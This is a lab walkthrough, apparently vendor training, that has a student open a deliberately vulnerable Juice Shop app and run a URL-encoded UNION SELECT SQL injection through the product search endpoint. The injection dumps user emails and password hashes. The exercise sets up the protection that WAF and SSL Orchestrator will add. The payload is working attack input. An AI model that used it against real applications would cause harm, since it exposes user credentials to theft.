4.3. The Juiceshop Application

We will start by establishing an RDP session to the Ubuntu 18.04 Client.

  • Start an RDP session to the Ubuntu 18.04 CLient (Components > Ubuntu18.04 Client > ACCESS > XRDP)

    UDF Ubuntu Client RDP

  • When prompted, save the RDP file to your local machine and then open it to connect.

  • At the Ubuntu Login prompt, click on the OK button to continue.

    UDF Ubuntu XRDP

    Tip

    If the RDP session times out, refer to the User Credentials for the student user password.

  • Open the Firefox browser

  • Click on the Juiceshop bookmark on the browser bar

    ../../_images/juiceshop-bookmark.png

  • Accept the security risk by clicking Advanced and Accept the Risk and Continue. This is due to the BIGIP using a self-signed certificate.

    ../../_images/certificate-risk.png

Here is the vulnerable Juiceshop application. Next, we will try a simple SQL injection attack that will illustrate why WAF protection is necessary.

../../_images/juiceshop-rdp.png 
/rest/products/search?q=qwert%27%29%29%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--

  • The browser's location bar should look like this:

https://10.1.20.200/rest/products/search?q=qwert%27%29%29%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--

This will cause the application to dump a list of users in the database to include their hashed passwords. YIKES!

../../_images/juiceshop-sql.png

Warning

An attacker could easily grab the hashed passwords and decrypt in a free password hash cracker widely available on the internet. We will take steps to protect this insecure application using SSL Orchestrator and WAFaaS.